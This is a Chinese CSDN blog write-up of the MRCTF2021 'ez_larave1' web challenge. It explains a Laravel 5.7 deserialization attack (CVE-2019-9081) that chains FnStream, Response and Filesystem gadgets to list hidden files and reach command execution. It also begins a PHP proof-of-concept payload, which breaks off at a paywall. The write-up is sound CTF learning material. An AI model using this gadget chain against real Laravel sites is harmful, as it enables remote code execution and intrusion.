[MRCTF2021]Web复现ez_larave1

最新推荐文章于 2022-11-22 12:09:29 发布
最新推荐文章于 2022-11-22 12:09:29 发布
阅读量935 收藏 3
点赞数 3
分类专栏: 比赛wp 文章标签: python php java laravel web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51078229/article/details/115873888
版权
本文详细介绍了Laravel框架中的CVE-2019-9081漏洞,通过对比源码发现了序列化问题。利用此漏洞,通过构造特定的POC,可以触发命令执行。首先,通过Filesystem类的__toString()方法遍历目录找到.axxx.txt文件,然后利用Response类的sendContent()方法回显文件名。由于原漏洞入口被修改,需借助FnStream.php的__destruct()执行PendingCommand.php中的run()方法。最终,给出了两个不同的payload示例,实现漏洞利用。
摘要由CSDN通过智能技术生成

ez_larave1

考察的是Laravel的CVE-2019-9081,影响版本为5.7.x
get到一个新工具:BeyondCompare,用来比较文件差异的,可以比较方便的看出他做了哪些开发

把5.7.x的源码下载下来,比较一下,发现序列化!
有个小绕过,在serialize后随便加一点东西就可以了,比如serializeabc
在这里插入图片描述
与网上的poc不同,他的路由命名为hello了,在hello路由下可以执行反序列化
在这里插入图片描述

在网上找到的cve复现,看到漏洞是在PendingCommand.php出现的,跑去看看
果然有信息
在这里插入图片描述
要读取到这个key,才能进行下一步的操作,得用原生类

下面来构造第一个poc

我们的目的是找出这个.axxx.txt的完整的文件名
在Filesystem这个类里面使用了FilesystemIterator迭代器遍历目录,会把参数里的目录全遍历出来
这样的话我们反序列化的时候去触发这个__toString()方法把参数传进去来遍历当前的目录,就可以遍历到.axxxx.txt了
在这里插入图片描述
当触发了__toString方法后就会返回文件名,那我们就得找一个能把他回显出来的东西

在vendor/symfony/http-foundation里面有个Response.php,这里面有一个方法sendContent
这个方法就会打印出content
在这里插入图片描述
在这里插入图片描述
析构方法
在这里插入图片描述
所以我们可以这样构造一个析构方法,因为前面说了触发了__toSring后会返回文件名
所以我们让:content的值=这个返回的文件名,再去**触发这个sentContent()**就可以把文件名给回显出来了

在原来的cve中,命令的执行会发生在PendingCommand.php的__destruct()里面
但是这题他把&this->run()删除了,那我们就得另寻他路来执行到PendingCommand.php中的run()这个函数了
在这里插入图片描述

看wp知道,预期解里面__destrusct()入口在FnStream.php里面,有个call_user_func()
这里原来是不能反序列化的,出题人注释掉了限制__wakeup()所以这里是可以执行命令的

但是这里是有个问题的,这个call_user_func()只能传入一个参数,那么我们就要考虑利用pop链让他执行某个类内部的方法
至于怎么调用类内部的方法:给这个函数传入一个数组,第一个值是你想调用的类的实例,第二个值是那个类对应的某个方法名
在这里插入图片描述

由于他只会执行$_fn_close,那我们就可以直接定义好$_fn_close进行变量的覆盖,让我们
在这里插入图片描述

所以我们大概需要的东西就已经齐全了,屡一下思路

  • 实例化Filesystem,想办法去触发__toString()方法利用里面的FilesystemIterator原生类
  • 实例化Response类,把实例化Filesystem的对象作为字符串传给Response赋值给content
  • 利用FnStream来执行Response里面的sendContent方法,回显出文件名

poc1

<?php
use Psr\Http\Message\StreamInterface;
namespace GuzzleHttp\Psr7{
   
    class FnStream {
   
        private $methods;
        private static $slots = ['__toString', 'close', 'detach', 'rewind',
            'getSize', 'tell', 'eof', 'isSeekable', 'seek', 'isWritable', 'write',
            'isReadable', 'read', 'getContents', 'getMetadata'];
        public $_fn_close;

        public function __construct($obj){
   
            $this->_fn_close = $obj;
        }

        public function __destruct()
        {
   
            if (isset($this->_fn_close)) {
   
                call_user_func($this->_fn_close);
            }
        }



    }
}



namespace Symfony\Component\HttpFoundation{
   
    class Response{
   

        public $content;
        public function __construct($obj)
        {
   
            $this->content = $obj;
        }

        public function sendContent(){
   
            echo $this->content;
            return $this;
        }
最低0.47元/天 解锁文章
huamanggg
关注
专栏目录
搜索 一道CTF题引起的对laravel v8.32.1序列化利用链挖掘
jklbnm12的博客
07-15 348
目录 0x00 前言 0x01 利用条件 0x02 环境配置 0x03 链条分析 call_user_func([可控],[可控]) 网络安全学习资料点击白嫖 call_user_func([可控],[可控],[可控]) call_user_func_array([完全可控]) eval([完全可控]) 0x00 前言 前几天刚搞完V&NCTF,里边有一道easy_laravel题目引起了我的注意(指挖了一下午的序列化链,结果路由不正确无法利用CVE反序列化,呜呜呜,气...
MRCTF 2021 8bit adventure
weixin_45966329的博客
04-14 346
MRCTF 2021 8bit adventure 程序大概的意思是只能用一个字节的汇编语句进行orw 要注意的是程序中使用了close(0),使用使用open系统调用时返回的文件描述符应该是0 懂汇编就会做 from pwn import * context(os='linux', arch='x86',log_level='debug') io=process("adventure") # ebx,ecx,edx # open 利用自加和自减控制寄存器的值,利用push和pop 还有修改esp 在栈上
MRctf 2021
m0_50967960的博客
04-15 210
MISC 零宽字符隐写:不可见的,不可打印的字符 https://blog.csdn.net/Amherstieae/article/details/108909743
2021-04-06,[MRCTF2020]PYWebsite,[MRCTF2020]pyFlag
探针一号的博客
04-07 570
1
MRCTF2021 ETH uncertainty
feng的博客
04-21 664
前言 昨天前天遇到的区块链题目有有些远超我目前的能力范围了,因此做的非常难受,决定先扔了,循序渐进,不好高骛远。突然想到MRCTF2021的那2道区块链自己还没有去复现,昨天想着去复现,今天发现MRCTF的站关了。。。利用着大师傅的WP上面的记录,找到了目标合约,进行复现。不过这题本身是没有给源码的,是需要逆向的,奈何我源码都读了几遍了才知道。。。没办法就直接拿着源码来复现叭。这题的难点其实还是逆向,直接看源码的话就会简单许多。 WP 源码: pragma solidity ^0.4.17; interf
MRCTF 2021 Dynamic Debug
__ys的博客
04-15 342
Dynamic Debug (这是除了签到题我唯一能做的了,据说它还是出题人的失误 ) 得到ELF文件,先用虚拟机跑一下 丢进IDA 通过搜索字符串找到main函数 首先可以得知flag的长度为32,其次当我们继续分析会发现验证函数被添加了花指令,IDA无法识别。 这时我们动调一下就会发现动调后的代码发生了变化,可以初步判定为smc。 然后就可以找到一段极其像验证函数的代码 但是这一部分IDA没有分析,我们找到函数头P一下创建函数 发现F5后代码极其不可读,需要平衡一下堆栈,用keypatch在函
[CTF]SCTF2021 WEB复现(详细版)
Sapphire037的博客
01-09 4317
Loginme 下载附件得到源码,题目让我们本地访问,也就是要伪造ip,但是是有检测的,源码: package middleware import ( "github.com/gin-gonic/gin" ) func LocalRequired() gin.HandlerFunc { return func(c *gin.Context) { if c.GetHeader("x-forwarded-for") != "" || c.GetHeader("x-client-ip") != ""
[MRCTF2020] web题-Ez_bypass
BROTHERYY的博客
08-18 368
复现环境:buuoj.cn 开题源码一份 //I put something in F12 for you include 'flag.php'; $flag='MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}'; if(isset($_GET['gg'])&&isset($_GET['id'])) { $id=$_GET['id']; $gg=$_GET['gg']; if (md5($id) === md5($gg) && $id
[GFCTF 2021]Baby_Web复现)
qq_53460654的博客
12-20 4778
打开环境 所以要我们读取上层目录的某个文件 所以我想应该会存在任意文件读取和路径穿越漏洞 然后标签有CVE-2021-41773 所以直接github拿到这个漏洞的 工具 payload 我们来读一下index.php.txt <?php error_reporting(0); define("main","main"); include "Class.php"; $temp = new Temp($_POST); $temp->display($_GET['filename']); ?
[SCTF2021]Upload_it_1复现闭包组件反序列化rce
Huamang的博客
02-11 3388
题目地址 SycloverTeam提供了题目的docker环境 https://github.com/SycloverTeam/SCTF2021/tree/master/web/Upload_it_1 wp 首先题目给了composer.json { "name": "sctf2021/upload", "authors": [ { "name": "AFKL", "email": "upload@qq.com"
MRCTF2021 dynamic_debug新手详细复现
m0_51357657的博客
04-15 414
Dynamic_debug 一道惦记了很久的题,今天终于!历尽千辛万苦 复现出来,必须得记录了~~~根据题目,大概率要动调,看了官方wp知道了是smc(MR师傅tql),那确实得动调了,静态的话再怎么修复出来都是不对的。 以下详细记录一个新手废物怎么胡改乱改 修复代码的: (如果有错的地方请路过的师傅们指点!谢谢谢谢!) Step1, 按C强制转换 得到关键汇编代码部分,先随便找个大概位置下断,开始动调: 开始位置按P创建Function,在长度判断跳转处下断绕过 呃,提前说明哈,我是在看了官方wp知
[MRCTF 2021]wwwafed_app
fightte的博客
05-18 415
之前打的MRCTF,没做出来什么题,也算是一种体验了~ 这是大佬带出来的一道题: 进去之后是一个前端界面,先看前端,有一个输入框,输入域名来检测是否能连通,右上角,有一个waf source,可以点击: 得到和waf有关的源码: import re,sys import timeout_decorator @timeout_decorator.timeout(5) def waf(url): # only xxx.yy-yy.zzz.mrctf.fun allow pat = r'
[MRCTF2021]ez_laravel复现
fightte的博客
05-21 602
前言 还是之前打的mrctf,难度比较大,也是第一次正式比赛出现了lara题目,近来多数比赛,包括CISCN都习惯出lara的题目,算是比较好的框架,但当时被带的做起了,现在复现一次: 考察的是Laravel的CVE-2019-9081,影响版本为5.7.x,当时别个搜CVE也能搜出来,先下载下来,lara5.7 但lara5.7里面没有vendor,在文件夹下,用cmd命令 composer install就可产生: 开始对比: 主要差别确实就是MRCTF的www_laravel,其app/Http/
MRCTF2021&Super32官方exp的复现
qq_39948058的博客
08-26 377
Mrctf&Super32官方exp复现 **前言: 说实话,这次MRCTF的比赛题的质量很高,高的我这种菜鸡都不太会做,所以赛后根据官方的exp来复现一下,这里只简绍一下exp的大概思路/ 思路:我们要让其换表,也就是base32编码后再进行换表,换表后再与解码后的大小check进行替换,结果其大于预先程序设定的大小,这样就直接产生了溢出,这里官方的exp是溢出打top chunk的size,然后进行分配打tc chunk的fd进行malloc_hook为rce,就可以获得shell了。 相对于
MoeCTF 2021 webWP
Magic_WangXu的博客
09-27 607
moectf2021 web题解http://47.103.121.189/2021/09/22/moectf%e8%a5%bf%e5%ae%89%e7%94%b5%e5%ad%90%e7%a7%91%e6%8a%80%e5%a4%a7%e5%ad%a6%e6%96%b0%e7%94%9f%e8%b5%9b-wp/
攻防世界 WEB easy_laravel
qq_41696858的博客
02-06 3546
这题我一开始是在攻防世界做的,但是不知道今天靶场又抽什么风了。。。。反正两个靶场配置有点不一样,但是出入不是很大,BUUCTF需要提前手动利用管理员邮箱reset_password一下,攻防世界不需要 打开场景,审计页面源码,发现源码地址直接给出来了,非常的简单粗暴啊 https://github.com/qazxcv123/easy_laravel 建议把源码下下来,自己搭个环境慢慢看,不然不方便。那就看源码呗,先看路由,mvc的入口点 哦对了先说一下,larvel是一个PHPweb框架 在一个个尝试路
18年护网杯 Easy Laravel Writeup
Tel_milk的博客
11-22 1110
2018护网杯Easy Laravel Writeup,CTF平台攻防世界,难度10
[MRCTF 2022]web题目复现
cosmoslin的博客
04-27 1580
WEB webcheckin 一个文件上传点,可以上传webshell但是有检测,这里用二进制绕过 <?php class KUYE{ public $DAXW = null; public $LRXV = null; function __construct(){ $this->DAXW = '1100101 1110110 1100001 1101100 101000 100100 1011111 1010000 10011
ubuntu20.04复现orb_slam2
最新发布
09-14
1. 首先,您需要安装OpenCV 3.2。根据引用中提到的内容,您可以使用以下命令将OpenCV 3.2添加到您的系统中: ``` sudo apt-get install build-essential cmake git libgtk2.0-dev pkg-config libavcodec-dev ...
评论 9
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

huamanggg

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值